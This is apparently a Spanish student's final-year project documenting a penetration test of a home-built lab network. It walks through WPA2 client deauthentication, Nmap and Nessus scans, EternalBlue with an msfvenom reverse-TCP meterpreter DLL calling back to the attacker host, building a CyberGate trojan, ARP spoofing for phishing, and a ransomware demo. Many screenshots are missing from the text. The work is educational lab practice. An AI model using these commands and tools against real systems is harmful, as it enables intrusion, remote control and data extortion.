Documente Academic
Documente Profesional
Documente Cultură
Proof Of Concept
ElliotSnow
pg. 1
ElliotSnow
pg. 2
ElliotSnow
Decid hacer este proyecto porque me encanta todo el tema relacionado con el hacking y
la seguridad informtica y me pareci buena idea usar mis conocimientos para realizar mi
proyecto del grado superior de administracin de sistemas informticos en red basado en
este tema. Bajo mi punto de vista no somos conscientes de los peligros que corremos
cuando sin saberlo utilizamos sistemas vulnerables.
2. Infraestructura de la red
pg. 3
ElliotSnow
Dispositivo 1:
Nombre de la maquina Router
Sistema Operativo Debian
Vulnerabilidad a explotar Airckrack-ng
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 dhcp 255.255.255.0 192.168.1.1
eth1 192.168.100.1 255.255.255.0
Dispositivo 2:
Nombre de la maquina Firewall
Sistema Operativo Debian
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.2 255.255.255.0 192.168.100.1
eth1 192.168.200.1 255.255.255.0
Dispositivo 3:
Nombre de la maquina Cliente1 Winxp
Sistema Operativo Windows XP
Vulnerabilidad a explotar ms08_067
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.5 255.255.255.0 192.168.1.1
Dispositivo 4:
Nombre de la maquina Cliente2 Windows 7
Sistema Operativo Windows 7
Vulnerabilidad a explotar ms17-010
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.3 255.255.255.0 192.168.1.1
Dispositivo 5:
Nombre de la maquina Cliente3 Windows 10
Sistema Operativo Windows 10
Vulnerabilidad a explotar Phising & Troyano
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.4 255.255.255.0 192.168.1.1
Dispositivo 7:
Nombre de la maquina srvbancocentral WinServer 2012
Sistema Operativo Windows Server 2012
Vulnerabilidad a explotar xampp_webdav_upload_php
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.200.5 255.255.255.0 192.168.200.1
pg. 4
ElliotSnow
Dispositivo 8:
Nombre de la maquina Kali Linux
Sistema Operativo Kali Linux
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.88 255.255.255.0 192.168.100.1
Dispositivo 9:
Nombre de la maquina Windows XP (ATACANTE)
Sistema Operativo Windows XP
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.14 255.255.255.0 192.168.100.1
pg. 5
ElliotSnow
3. Hacking Wifi
Pondremos en modo monitor nuestra interfaz wifi con el comando airmon-ng start wlan0
pg. 6
ElliotSnow
Como se puede observar tenemos la red con el ESSID BANCOCENTRAL, que es la que
queremos atacar, esta red tiene la MAC (BSSID): C4:6E:1F:67:B9:74, tiene cifrado WPA2 y
utiliza el canal 4.
Ahora tendremos que desautenticar al cliente que se encuentra en la red para ello
utilizaremos el comando
aireplay-ng -0 100 -a C4:6E:1F:67:B9:74 -c 18:F6:A3:A1:EB:C6 wlan0mon
pg. 7
ElliotSnow
pg. 8
ElliotSnow
4. Tipos de anlisis
4.1. Nmap
Qu es Nmap?
Nmap (mapeador de redes) es una herramienta de cdigo abierto para exploracin
de red y auditora de seguridad.
Se dise para analizar rpidamente grandes redes, aunque funciona muy bien contra
equipos individuales. Para determinar qu equipos se encuentran disponibles en una
red, qu servicios (nombre y versin de la aplicacin) ofrecen, qu sistemas
operativos (y sus versiones) ejecutan, qu tipo de filtros de paquetes o cortafuegos se
estn utilizando as como docenas de otras caractersticas.
# Nmap 7.40 scan initiated Sun May 21 17:59:59 2017 as: nmap -A -T4 -sV -oA
Bancocentral 192.168.100.0/24
TRACEROUTE
HOP RTT ADDRESS
1 0.63 ms 192.168.100.1
-Conclusin:
1. Podemos identificar que este equipo tiene un servicio de dns con bind9
53/tcp open domain
| dns-nsid:
|_ bind.version: 9.9.5-9+deb8u10-Debian
2. Que tiene un servidor web apache 2.4.10:
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.100.2
-Conclusin:
Solo identificamos un host activo en la red con la ip 192.168.100.2
TRACEROUTE
HOP RTT ADDRESS
1 0.86 ms 192.168.100.3
pg. 10
ElliotSnow
-Conclusin:
1. Puertos abiertos
135 (msrcp), 139 (netbios), 445 (microsoft-ds), 5357, 49152-49157 (msrcp)
3. smb-os-discovery
Smb v2
TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.100.4
-Conclusin:
1.Puertos abiertos
135 (msrcp), 139 (netbios), 445 (microsoft-ds)
pg. 11
ElliotSnow
3.smb-os-discovery
smb v2
TRACEROUTE
HOP RTT ADDRESS
1 4.14 ms 192.168.100.5
-Conclusin:
1. Puertos abiertos
139 (netbios), 445 (micfosoft-ds), 3389 (ms-wbt-server)
4. smb-os-discovery
smb v2
pg. 12
ElliotSnow
4.2. Nessus
Qu es Nessus?
Es un escner de redes que detecta posibles vulnerabilidades en las mquinas de una
red (basndose en la lista de fallas conocidas). Se utiliza para comprobar la seguridad
y encontrar vulnerabilidades para que puedan ser solucionadas por el administrador
del sistema.
pg. 13
ElliotSnow
Una vez termine el escaneo, podremos ver unos grficos de los distintos host que
hemos analizado y el tipo de vulnerabilidades que ha detectado, nos centraremos en
las crticas de los host 192.168.100.5 y 192.168.100.3
pg. 14
ElliotSnow
pg. 15
ElliotSnow
Despus hacemos clic sobre el host 192.168.100.3 y podremos ver informacin sobre
vulnerabilidades que tiene
pg. 16
ElliotSnow
5. Explotacin de vulnerabilidades
Qu es Metasploit?
Metasploit es Framework. Que est diseado para explotar las vulnerabilidades de
los equipos. Dentro de Metasploit, disponemos de multitud de exploits para ejecutar
en las diferentes vulnerabilidades en las maquinas remotas.
pg. 17
ElliotSnow
Una vez terminado de lanzarse el ataque tendremos el control del equipo victima
pg. 20
ElliotSnow
Una vez haya cargado Funzzbunch para utilizar Eternalblue escribiremos el comando
use EternalBlue
pg. 21
ElliotSnow
pg. 22
ElliotSnow
Ahora nos iremos a nuestra maquina KaliLinux y crearemos una DLL maliciosa con
msfvenom
msfvenom -a x64 -p windows/meterpreter/meterpreter_reverse_tcp
LHOST=192.168.100.88 LPORT=4444 -f dll > meter.dll
pg. 23
ElliotSnow
pg. 24
ElliotSnow
Nos pedir que si ejecuta el Plugin y si todo sale bien nos mostrara
Doublepulsar Succeded
pg. 25
ElliotSnow
Una vez inyectada la DLL nos vamos nuevamente a nuestra maquina KaliLinux
Ejecutaremos metasploit con msfconsole
Seleccionaremos el exploit exploit/multi/handler
Cambiamos LHOST por nuestra IP
Cambiamos LPORT por el puerto que pusimos antes
Y ejecutamos el exploit con el comando exploit
pg. 26
ElliotSnow
Para esta prueba utilizare CyberGate, primero tenemos que configurar el servidor del
troyano el cual se ejecutara en el equipo vctima, abrimos control center, builder y
seleccionamos create server
pg. 27
ElliotSnow
pg. 28
ElliotSnow
Desmarcamos todas las opciones para que no se cancele la ejecucin del servidor
pg. 29
ElliotSnow
pg. 30
ElliotSnow
Con el icono hemos lo mismo, hacemos clic sobre l y busco uno que ser el que se le
muestre e la vctima, hacemos clic en Create Server y seleccionamos la ruta donde lo
deseamos guardar.
pg. 31
ElliotSnow
5.3.2. Phishing
Qu es el phishing?
Consiste en engaar a la vctima mediante un ataque hacindonos pasar por alguien de
confianza, con esto engaaremos a la vctima para que se descargue un software
malicioso.
Primero tenemos que envenenar las tablas arp, para ello utilizaremos arpspoof
arpspoof -i [interface] -t [victima] [router]
pg. 32
ElliotSnow
pg. 33
ElliotSnow
pg. 34
ElliotSnow
Qu es un Ransomware?
pg. 35
ElliotSnow
Seleccionaremos una ruta donde se creara un documento txt con informacin para
que la victima pueda recuperar sus archivos.
5.4.2 xampp_webdav_upload_php
pg. 36
ElliotSnow
6. Conclusiones
Como hemos podido observar somos mas vulnerables de lo que pensamos, no es dificil
que alguien penetre en nuestro sistema
7. Bibliografia
https://www.aircrack-ng.org/
https://nmap.org/
https://www.tenable.com/products/nessus-vulnerability-scanner
https://www.kali.org/
https://www.metasploit.com/
https://github.com/misterch0c/shadowbroker
https://github.com/goliate/hidden-tear
pg. 37